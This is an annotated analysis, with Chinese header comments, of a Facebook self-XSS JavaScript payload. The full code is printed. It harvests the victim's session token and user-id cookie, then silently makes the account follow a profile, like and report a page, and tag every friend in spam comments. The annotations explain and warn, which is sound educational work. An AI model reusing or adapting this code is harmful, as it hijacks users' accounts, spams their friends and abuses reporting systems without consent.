Facebook 惡意代碼分析
/*
* 原始資料來自:
* https://gist.github.com/Inndy/8618115
* 而Allen對此檔案做了更詳細的註解
* 請尊重原始作者,還有執行這程式會悲劇,另外如果我有註解錯誤或是程式錯誤,歡迎提出
*/
/* Session material harvested from the victim's own page and cookies.
 * Presumably a self-XSS payload pasted into a logged-in browser console
 * (the header comment warns against running it); nothing below works
 * without a valid fb_dtsg and c_user for the current session. */
var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value; // anti-CSRF form token that every request below sends as fb_dtsg
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); // NOTE(review): the outer match() is redundant — the inner one already captures the numeric c_user value; the result is a match array, which coerces to the id digits when concatenated into the request bodies below
/* 追蹤用戶 */
/* Follow a user: POSTs to follow_profile.php so the victim's account follows `abone`. */
function a(abone) { // abone: id of the profile to follow
var http4 = new XMLHttpRequest;
var url4 = "/ajax/follow/follow_profile.php?__a=1";
var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp="; // form body; "&lsd&__" + user_id has no key name or "=", so that fragment is malformed — likely a transcription error in the original sample
http4.open("POST", url4, true); // asynchronous POST to follow_profile.php
http4.onreadystatechange = function () {
if (http4.readyState == 4 && http4.status == 200) http4.close; // no-op: `close` is only referenced, never called (XMLHttpRequest has abort(), not close())
};
http4.send(params4); // fire the follow request; the response is ignored
}
a("100001639786608"); // follow this profile — the original annotator states this is their own Facebook id
/* 對粉絲團按讚 */
/* Like a page: POSTs to fan_status.php with add=true so the victim's account becomes a fan of page `p`. */
function Like(p) { // p: id of the page to like
var Page = new XMLHttpRequest();
var PageURL = "//www.facebook.com/ajax/pages/fan_status.php"; // protocol-relative, so it inherits http/https from the current page
var PageParams = "&fbpage_id=" + p + "&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=" + fb_dtsg + "&phstamp="; // form body; __dyn/__req are hard-coded client-state values copied from a real session
Page.open("POST", PageURL, true); // asynchronous POST to fan_status.php
Page.onreadystatechange = function () {
if (Page.readyState == 4 && Page.status == 200) {
Page.close; // no-op: property reference, not a call
}
};
Page.send(PageParams); // fire the like request
}
Like("198417206917970"); // like this page — the original annotator identifies it as the "電腦故我在" page
/* 檢舉指定粉絲團 */
/* The token and user id are re-read here (and again before the tagging section).
 * `var` redeclaration is legal and yields the same values; it suggests the sample
 * was stitched together from several independently written snippets. */
var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); // same redundant double match() as above
var now = (new Date)["getTime"](); // current time in epoch milliseconds; sent as time_flow_started in Report()
/* Report a page: POSTs to ajax/report/social.php on behalf of the victim.
 * The `pp` parameter is a URL-encoded JSON object; decoded it reads:
 * {"actions_to_take":"[]","are_friends":false,"cid":<arg1>,"content_type":0,
 *  "expand_report":1,"first_choice":"file_report","from_gear":"timeline",
 *  "is_following":false,"is_tagged":false,"on_profile":false,"phase":3,
 *  "ref":"https:\/\/www.facebook.com\/Nan.ertt7","report_type":145,"rid":<arg1>,
 *  "sub_report_type":3,"time_flow_started":<now>,"user":<user_id>}
 * The body also carries block=1 and file_report=1; whether block=1 additionally
 * blocks the page is not determinable from this listing. ttstamp is hard-coded.
 * Bracket-notation property access (xhr["open"]) is a common obfuscator output style. */
function Report(arg1) { // arg1: id of the page to report (used as both cid and rid)
var xhr = new XMLHttpRequest();
var url = "//www.facebook.com/ajax/report/social.php";
var param = "fb_dtsg=" + fb_dtsg + "&block=1&pp=%7B%22actions_to_take%22%3A%22[]%22%2C%22are_friends%22%3Afalse%2C%22cid%22%3A" + arg1 + "%2C%22content_type%22%3A0%2C%22expand_report%22%3A1%2C%22first_choice%22%3A%22file_report%22%2C%22from_gear%22%3A%22timeline%22%2C%22is_following%22%3Afalse%2C%22is_tagged%22%3Afalse%2C%22on_profile%22%3Afalse%2C%22phase%22%3A3%2C%22ref%22%3A%22https%3A%5C%2F%5C%2Fwww.facebook.com%5C%2FNan.ertt7%22%2C%22report_type%22%3A145%2C%22rid%22%3A" + arg1 + "%2C%22sub_report_type%22%3A3%2C%22time_flow_started%22%3A" + now + "%2C%22user%22%3A" + user_id + "%7D&file_report=1&__user=" + user_id + "&__a=1&__dyn=7n8ahyj2qmvu5k9UmAAaUVpo&__req=u&ttstamp=2658168571071108880";// POST body (decoded in the header comment above)
xhr["open"]("POST", url, true); // asynchronous POST to social.php
xhr["onreadystatechange"] = function () {
if (xhr["readyState"] == 4 && xhr["status"] == 200) {
xhr["close"]; // no-op: property reference, not a call
};
};
xhr.send(param); // fire the report request
};
Report("198417206917970"); // report the same page that was just liked — the annotator identifies it as the "電腦故我在" page
/* Tag一堆好友到指定照片 */
/* Third copy of the session-material harvest, for the friend-tagging section. */
var fb_dtsg = document["getElementsByName"]("fb_dtsg")[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); // same redundant double match() as above
var arkadaslar = []; // "friends" (Turkish); overwritten by eval() in arkadaslari_al with the parsed typeahead response
var svn_rev; // declared but never used anywhere in this listing
/* Fetch the victim's friend list and tag all of them, 27 per comment, on object `id`.
 * Name is Turkish for "get friends". GETs the first_degree typeahead endpoint
 * (filter=user, options=friends_only) and, on completion, parses the response
 * with eval() and hands each batch of mentions to yorum_yap(). */
function arkadaslari_al(id) { // id: the photo/post whose comments receive the tags
var xhr = new XMLHttpRequest();
xhr["onreadystatechange"] = function () {
if (xhr["readyState"] == 4) { // note: no status check — a non-200 body would still reach eval()
// Tag friends in bulk
eval("arkadaslar = " + xhr["responseText"].toString()["replace"]("for (;;);", "") + ";"); // CORRECTION to the original annotation: this does not run an infinite loop. Facebook prefixes JSON responses with "for (;;);" as an anti-JSON-hijacking guard so they cannot be consumed via a cross-origin <script> include; the sample strips that prefix and eval()s the remainder to turn it into an object. (The guard is not a defense here because this is a same-origin XHR.)
for (f = 0; f < Math["round"](arkadaslar["payload"]["entries"]["length"] / 27); f++) { // f, i, mesaj, mesaj_text are all implicit globals (no var). Math.round means a trailing partial batch of fewer than ~14 entries is skipped
mesaj = "";
mesaj_text = "";
for (i = f * 27; i < (f + 1) * 27; i++) { // one batch of up to 27 friends
if (arkadaslar["payload"]["entries"][i]) { // guards the last batch running past the end of entries
mesaj += " @[" + arkadaslar["payload"]["entries"][i]["uid"] + ":" + arkadaslar["payload"]["entries"][i]["text"] + "]"; // "@[uid:name]" fragments that become the comment_text in add_comment.php
mesaj_text += " " + arkadaslar["payload"]["entries"][i]["text"]; // plain-name version; built but never used
};
};
yorum_yap(id, mesaj); // post one comment per batch (see yorum_yap below)
};
};
};
var str = "&filter[0]=user";
str += "&options[0]=friends_only";
str += "&options[1]=nm";
str += "&token=v7";
str += "&viewer=" + user_id;
str += "&__user=" + user_id; // query string assembled one parameter at a time (original annotator also wondered why)
if (document["URL"]["indexOf"]("https://") >= 0) { // pick the scheme matching the current page
xhr["open"]("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + str, true); // GET over https
} else {
xhr["open"]("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + str, true); // GET over http
};
xhr["send"]();
};
//隨機Tag朋友
/* Build a string of nine random "@[uid:name]" mentions drawn from the global
 * `arkadaslar` friend list. Never called anywhere in this listing.
 * Note the uid and the name come from two independent Math.random() draws,
 * so a mention's name will generally not belong to its uid. */
function RandomArkadas() {
var str = "";
for (i = 0; i < 9; i++) { // i is an implicit global, shared with arkadaslari_al
str += " @[" + arkadaslar["payload"]["entries"][Math["floor"](Math["random"]() * arkadaslar["payload"]["entries"]["length"])]["uid"] + ":" + arkadaslar["payload"]["entries"][Math["floor"](Math["random"]() * arkadaslar["payload"]["entries"]["length"])]["text"] + "]";
};
return str;
};
/* Post a comment: POSTs to /ajax/ufi/add_comment.php with `_0x7892xc` as the
 * comment text under object `id`. Name is Turkish for "make a comment";
 * the hex-style parameter name is typical obfuscator output. Only comment_text
 * is URL-encoded; every other value is concatenated raw. */
function yorum_yap(id, _0x7892xc) { // id: target post/photo; _0x7892xc: comment text (the "@[uid:name]" batch from arkadaslari_al)
var xhr = new XMLHttpRequest();
var str = "";
str += "&ft_ent_identifier=" + id;
str += "&comment_text=" + encodeURIComponent(_0x7892xc);
str += "&source=2";
str += "&client_id=1377871797138:1707018092"; // hard-coded client id copied from a real session
str += "&reply_fbid";
str += "&parent_comment_id";
str += "&rootid=u_jsonp_2_3";
str += "&clp={\"cl_impid\":\"453524a0\",\"clearcounter\":0,\"elementid\":\"js_5\",\"version\":\"x\",\"parent_fbid\":" + id + "}"; // raw (unencoded) JSON with the target id as parent_fbid
str += "&attached_sticker_fbid=0";
str += "&attached_photo_fbid=0";
str += "&giftoccasion";
str += "&ft[tn]=[]";
str += "&__user=" + user_id;
str += "&__a=1";
str += "&__dyn=7n8ahyj35ynxl2u5F97KepEsyo";
str += "&__req=q";
str += "&fb_dtsg=" + fb_dtsg;
str += "&ttstamp="; // same one-parameter-per-line assembly as the other requests
xhr["open"]("POST", "/ajax/ufi/add_comment.php", true); // asynchronous POST to add_comment.php
xhr["setRequestHeader"]("Content-type", "application/x-www-form-urlencoded"); // the only request in this sample that sets an explicit content type
xhr["onreadystatechange"] = function () {
if (xhr["readyState"] == 4 && xhr["status"] == 200) {
xhr["close"]; // no-op: property reference, not a call
};
};
xhr["send"](str); // fire the comment request
};
arkadaslari_al("613671255392561"); // entry point of the tagging section: tag the victim's whole friend list on this object
// Final reminder from the original annotator: really, do not run this